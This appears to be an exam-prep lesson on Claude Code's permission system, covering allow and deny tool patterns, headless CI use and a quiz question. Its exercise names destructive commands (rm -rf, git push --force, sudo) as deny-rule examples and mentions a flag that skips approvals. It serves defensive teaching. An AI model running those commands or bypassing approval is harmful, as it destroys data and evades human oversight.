C
Claude Code Expert

Task 3.4

Permissions & Security

Claude Code's permission system controls what actions the AI can take without human approval. Understanding permission modes, allowed/denied tool patterns, and security boundaries is essential for deploying Claude Code safely in team and enterprise environments.

Permission Modes

Claude Code offers permission modes that control how much autonomy the AI has. In the default mode, Claude Code asks for approval before executing potentially dangerous operations (shell commands, file modifications outside the project). In more permissive modes, specific tools can be pre-approved.

The --allowedTools flag and settings configuration let you pre-approve specific tools. For example, allowing the Edit tool means Claude can modify files without asking. Allowing 'Bash(npm test)' means Claude can run that specific command without approval.

Tool Patterns and Scoping

Allowed and denied tool patterns use glob-like syntax for precise control. You can allow or deny by tool name ('Edit', 'Bash'), by tool with specific arguments ('Bash(npm *)' allows any npm command), or by MCP namespace ('mcp__serverName__*' allows all tools from a specific MCP server).

Denied tools always take precedence over allowed tools. This means you can broadly allow a tool category and then deny specific dangerous patterns within it.

Security Boundaries

Claude Code operates within the user's permissions on the system. It can access any file the user can access and run any command the user can run. This means Claude Code's security model is 'same as the developer' — it does not provide sandboxing or privilege escalation.

For enterprise deployments, this means Claude Code should run in environments with appropriate access controls already in place. Do not rely on Claude Code's permission system as the sole security boundary.

Key Concept

Deny Rules Are Absolute, Allow Rules Are Additive

In Claude Code's permission model, denied tools are always blocked regardless of allow rules. Allow rules only pre-approve tools for automatic execution (skipping the approval prompt). This means you can create a secure baseline by denying dangerous patterns, then gradually allow safe operations. The deny list is the security boundary; the allow list is the convenience layer.

Exam Traps

EXAM TRAP

Thinking allow overrides deny

Deny always takes precedence. If a tool matches both an allow and a deny pattern, it is denied. This is a security design — deny is the hard boundary.

EXAM TRAP

Confusing Claude Code permissions with OS permissions

Claude Code runs as the user. Its permission system controls the approval flow, not OS-level access. The exam may test whether you understand this distinction.

EXAM TRAP

Not configuring permissions for CI/CD

In CI/CD (headless mode), there is no human to approve actions. You must pre-configure allowed tools or use --dangerously-skip-permissions (with appropriate safeguards).

Check Your Understanding

A team wants Claude Code to automatically run tests and lint code, but must never be able to push to git or modify CI configuration files. Which permission setup is correct?

Build Exercise

Configure Secure Permissions

Beginner20 minutes

What you'll learn

  • Set up allowed and denied tool patterns
  • Understand permission precedence
  • Configure permissions for CI/CD use
  • Test permission boundaries

  1. Create a project settings file that denies dangerous Bash patterns (rm -rf, git push --force, sudo) and allows safe development commands (npm test, npm run lint).

    WHY: A well-configured permission set balances safety and productivity.

    YOU SHOULD SEE: Settings with specific deny patterns and targeted allow patterns.

  2. Test the permission boundaries: try to run a denied command and verify it is blocked. Try an allowed command and verify it runs without approval.

    WHY: Testing permissions confirms your configuration works as intended.

    YOU SHOULD SEE: Denied commands are blocked; allowed commands execute automatically.

  3. Add MCP tool permissions: allow tools from a trusted MCP server and deny tools from an untrusted one.

    WHY: MCP tool permissions prevent unknown or untrusted servers from executing actions.

    YOU SHOULD SEE: Tools from the trusted server work; tools from the untrusted server are blocked.

  4. Create a CI/CD configuration that runs Claude Code in headless mode with pre-approved permissions for code review tasks only.

    WHY: CI/CD requires pre-configured permissions since there is no human to approve actions.

    YOU SHOULD SEE: A CI config that runs Claude Code with restricted, pre-approved tool access.

Sources

Previous

Hooks & Automation